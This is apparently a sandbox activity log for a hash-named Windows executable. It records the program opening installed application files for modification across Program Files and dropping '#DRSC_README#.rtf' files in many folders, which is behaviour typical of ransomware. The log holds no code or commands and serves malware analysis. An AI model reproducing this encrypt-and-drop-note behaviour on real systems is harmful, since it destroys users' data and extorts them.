710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\es\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\ta\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.w3c.dom.smil_1.0.0.v200806040011.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.sat4j.pb_2.3.5.v201404071733.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\vi\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-applemenu_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\MeasurePing.crw 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\ffjcext.zip 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\META-INF\MANIFEST.MF 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench_1.2.1.v20140901-1244.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\jce.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.bindings_0.10.200.v20140424-2042.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\tet\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\te.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\MST7MDT 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\serialver.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\javafxpackager.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.webapp.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\boot.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jmx_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\bs\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\ja\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.beans.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.jobs_3.6.0.v20140424-0053.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Casablanca 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\am\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\playlist.json 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Mozilla Firefox\browser\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\topnav.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Kiritimati 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jre7\lib\jfr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4-dark_win.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\bin\klist.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Windhoek 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Auckland 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\YST9YDT 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.jdp.ja_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-sampler_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-templates_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.p2.ui.overridden_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\THANKS.txt 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_ko.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Gambier 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\META-INF\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\hrtfs\dodeca_and_7channel_3DSL_HRTF.sofa 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\console_view.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Lisbon 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\VERSION.txt 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-nodes_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-attach.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_es.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\batch_window.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\AssertShow.M2T 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Montreal 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+1 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_18_b81900_40x40.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\de\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\North_Dakota\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-explorer_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_winxp_olv.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.resources_3.9.1.v20140825-1431.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.ui.ja_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher_1.3.0.v20140415-2008.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.webapp_3.6.300.v20140407-1855.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Thimphu 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\msjet.xsl 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\vimeo.luac 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Mozilla Firefox\application.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\modules\common.luac 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\cmm\PYCC.pf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Settings.zip 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.di.extensions_0.12.0.v20140417-2033.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.actionProvider.exsd 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-io-ui_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\images\cursors\invalid32x32.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Thule 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Detroit 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Adelaide 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\UnpublishConvertFrom.jpeg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Kaliningrad 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\.settings\org.eclipse.equinox.p2.metadata.repository.prefs 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.provider.filetransfer.httpclient4_1.0.800.v20140827-1444.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.syntheticattribute.exsd 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.http_8.1.14.v20131031.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\java-rmi.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\javacpl.cpl 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-3 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.zh_CN_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.flightrecorder_5.5.0.165303\feature.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+6 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.commands.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-coredump_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-multitabs_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\psfontj2d.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Nassau 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-awt.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Los_Angeles 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-sendopts_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\PST8PDT 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Boa_Vista 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Damascus 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Warsaw 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\London 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\South_Georgia 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Monaco 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\az\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\resources.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.swt.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Pontianak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\id.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\vi\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Paramaribo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ru\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\eu\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench3.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rcp.intro.ja_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.text.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-masterfs_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Seoul 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Tokyo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Rankin_Inlet 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Lima 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Fakaofo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Majuro 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.servlet_8.1.14.v20131031.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Atlantic\Canary 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\setNetworkServerCP.bat 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Mauritius 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-sampler.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host-views_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Vladivostok 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\PST8PDT 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\security\blacklist 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\UserControl.zip 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Module.zip 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.attach.ja_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\about.html 